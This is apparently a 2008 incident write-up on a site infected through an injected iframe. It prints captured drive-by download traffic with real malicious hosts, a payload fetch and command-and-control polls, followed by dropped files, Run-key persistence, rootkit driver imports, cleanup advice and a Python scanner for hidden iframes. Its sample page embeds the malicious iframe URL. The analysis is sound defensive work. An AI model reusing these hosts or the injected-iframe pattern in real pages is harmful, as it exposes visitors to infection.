Website with hidden iframe and Malware Analysis

It all began this morning (16/10/2008) at 13:00: I checked the HTML source of index.php and saw something suspicious inside it. Our index.php and four other .php pages had been carrying an injected iframe from 11:00 to 13:00. Fortunately we review the code of our site every 2 to 3 hours, so the injected code was removed immediately.

To analyze the iframe I used an old, unpatched Internet Explorer 6.0 so that the infection would be sure to succeed (this is only safe on an isolated, disposable machine). A few seconds after loading the iframe URL a massive malware infection started, and the computer began connecting to many different IPs.

Here is the sniffed network traffic (URLs in the Location headers are defanged as hxxp):

GET /in.cgi?id111 HTTP/1.1
Host: fstat.cn
Connection: Keep-Alive
 
HTTP/1.1 302 Found
Location: hxxp://mmcounter.com/tds/in.cgi?default
 
GET /tds/in.cgi?default HTTP/1.1
Accept-Language: en-us
Host: mmcounter.com
Connection: Keep-Alive
 
HTTP/1.1 302 Found
Location: hxxp://lite.ff-freehosting.com/all/index.php
 
GET /all/index.php HTTP/1.1
Host: lite.ff-freehosting.com
 
HTTP/1.1 200 OK
Content-Length: 7880
 
GET /all/controller.php?action=bot&entity_list=0 HTTP/1.1
Host: 66.232.116.2
 
HTTP/1.1 200 OK
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983332
Magic-Number: 32|0|85:214:242:0:116:131:195:213:214:77:222:73
 
GET /all/load.php?id=45751&spl=5 HTTP/1.1
Host: lite.ff-freehosting.com
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Content-Disposition: inline; filename=load.exe
Content-Length: 17475
 
GET /all/controller.php?action=bot&entity_list=&uid=2&first=1&guid=0&rnd=982735 HTTP/1.1
Host: 66.232.116.2
 
HTTP/1.1 200 OK
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983188
Magic-Number: 32|0|185:234:45:115:54:0:22:233:187:219:150
Connection: close

While the sniffer was running, the machine was infected: a file named winMN448Eewaoz.exe was downloaded to the Temp folder and, once executed, it dropped C:\WINDOWS\system32\~.exe. The executable was downloaded via this request (the response carried it as load.exe, 17475 bytes):

GET /all/load.php?id=45751&spl=5 HTTP/1.1

The load.php request carries a parameter named spl set to 5. A plausible reading is that spl identifies the exploit ("sploit") that succeeded, i.e. the payload was served because exploit number 5 triggered, which in turn suggests an exploit kit carrying at least five different exploits. This is an inference from the parameter name alone; the server-side code was not available.

Here is a small analysis of that malware activity:

  • Downloaded to the Temp folder as winMN448Eewaoz.exe
  • Copied to C:\WINDOWS\system32\~.exe
  • Injected code into svchost.exe
  • Opened remote connections with IP 66.232.116.2 on port 80

After some time other files were downloaded to my system. I started Rootkit Unhooker and noticed some suspicious drivers in the Driver List that suggested stealth malware or rootkit activity.

Opening Properties for rnvrnrrv.sys from the driver list shows a file of 0 bytes with no creation or modification information. Why 0 bytes and no metadata? The kernel driver rnvrnrrv.sys is loaded but hidden from Explorer search; it seems the driver hides every file whose name contains rnvrnrrv, which is consistent with a rootkit filtering the results of file-system queries so that user-mode tools see nothing.

Below is the PE import table of rnvrnrrv.sys:

+NTOSKRNL.EXE
ExAllocatePoolWithTag
ExFreePoolWithTag
ZwQuerySystemInformation
RtlImageDirectoryEntryToData
memcpy
memset
_except_handler3

The import set is small and telling: pool allocation, ZwQuerySystemInformation (which, with the SystemModuleInformation class, enumerates loaded kernel modules) and RtlImageDirectoryEntryToData (which locates a PE image's export and import directories). These are the primitives a driver needs to find ntoskrnl and hook or patch kernel functions, which fits the file-hiding behaviour observed above.

Here is a list of all files created by the malware (in no particular order):

C:\WINDOWS\msauc.exe
C:\WINDOWS\system32\*randomnumber*.cpx
C:\WINDOWS\system32\*randomnumber*.dat
C:\WINDOWS\system32\wpv*randomnumber*.cpx
C:\WINDOWS\system32\msansspc.dll
%TempFolder%\winMN448Eewaoz.exe
%ProgramFiles%\xeifh\SetActAdm.dll
%ProgramFiles%\Internet Explorer\msansspc.dll
C:\WINDOWS\system32\drivers\rnvrnrrv.sys
C:\WINDOWS\system32\shell31.dll
C:\WINDOWS\system32\fqqtiaag.tmp
C:\WINDOWS\TDEZAALK.exe
%AllUsers%\Application Data\almrahwt\mbqlmfin.exe

The malware created the following registry keys:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lsass driver
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TDEZAALK
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\[51m3u05p5i]

This is a HijackThis log excerpt showing the malware traces:

Running processes:
C:\WINDOWS\system32\wpv286.cpx
%AllUsers%\Application Data\almrahwt\mbqlmfin.exe
 
O4 - HKLM\..\Run: [lsass driver] C:\WINDOWS\msauc.exe
O4 - HKLM\..\Run: [TDEZAALK] %systemroot%\TDEZAALK.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Policies\Explorer\Run: [51m3u05p5i] %AllUsers%\Application Data\almrahwt\mbqlmfin.exe
O21 - SSODL: SetActAdm - {002069A6-342F-036E-4AAB-03598A9EEFCE} - C:\Programmi\xeifh\SetActAdm.dll (file missing)
(SwPrvSchedule) - Unknown owner - C:\WINDOWS\system32\wpv5338.cpx.exe (file missing)

What can we do if our website is infected?

  • Clean the infected HTML/PHP pages
  • Change the username and password of the FTP account
  • Change the username and password of the email account
  • Change the username and password of the SSH account
  • Contact the server admin and explain the situation
  • Check your PHP files for possible vulnerabilities
  • Update all installed software (blog, forum, etc.)
  • Never build your backups by downloading the files from the live website, since they may already carry the injected code
  • Always keep a clean local copy of the website files and restore from that
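As an added example (not from the original post), here is a Python scanner for the "check your pages" step: it walks a site directory and reports iframes that are zero-sized, hidden by CSS, or pointing at a host outside an allow-list, plus the document.write(unescape(...)) pattern commonly used to hide such frames in JavaScript. ALLOWED_HOSTS is an assumption to be replaced with your own domains; the sample page is constructed and reuses the iframe URL from the captured traffic above.

```python
"""Scan web files for injected iframes: zero-size frames, frames hidden by
CSS, frames pointing at non-allow-listed hosts, and the
document.write(unescape(...)) pattern used to hide frames in JavaScript."""
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: hosts the site legitimately embeds; replace with your own domains.
ALLOWED_HOSTS = {"www.example.com"}

HIDDEN_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)
OBFUSCATED_JS = re.compile(
    r"(?:eval|document\.write)\s*\(\s*unescape\s*\(", re.I)


def _tiny(value):
    """True for width/height of 0, 1 or 2 pixels, typical of injected frames."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return bool(m) and int(m.group(1)) <= 2


class IframeFinder(HTMLParser):
    """Collects (line, src, reasons) for every suspicious <iframe>."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        reasons = []
        host = urlsplit(src).hostname
        if host and host not in ALLOWED_HOSTS:
            reasons.append(f"external host {host}")
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("zero/tiny size")
        if HIDDEN_CSS.search(a.get("style", "")):
            reasons.append("hidden by CSS")
        if reasons:
            line, _ = self.getpos()  # position of the tag start
            self.findings.append((line, src, reasons))


def scan_text(text):
    """Return suspicious iframes and obfuscated script calls found in one page."""
    parser = IframeFinder()
    parser.feed(text)
    parser.close()
    findings = list(parser.findings)
    for m in OBFUSCATED_JS.finditer(text):
        line = text.count("\n", 0, m.start()) + 1
        findings.append((line, "<script>", ["document.write/eval(unescape(...))"]))
    return sorted(findings)


def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a site directory and map each file path to its findings."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    results[path] = hits
    return results


# Constructed sample page: one legitimate frame, one zero-size frame using the
# iframe URL from the captured traffic above, and one frame pushed off-screen.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="http://www.example.com/embed/map" width="400" height="300"></iframe>
<p>Content</p>
<iframe src="http://fstat.cn/in.cgi?id111" width="0" height="0" frameborder="0"></iframe>
<iframe src="/local.php" style="position:absolute; left:-9999px"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, src, reasons in scan_text(SAMPLE_PAGE):
        print(f"line {line}: {src}  [{', '.join(reasons)}]")
```

Run scan_tree over a clean local copy and over the live site and diff the results; anything that appears only on the live copy is what the attacker added. The scanner only sees what is in the files on disk, so code that is assembled at runtime from several obfuscated pieces can still slip past it; treat a clean result as a first check, not as proof.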
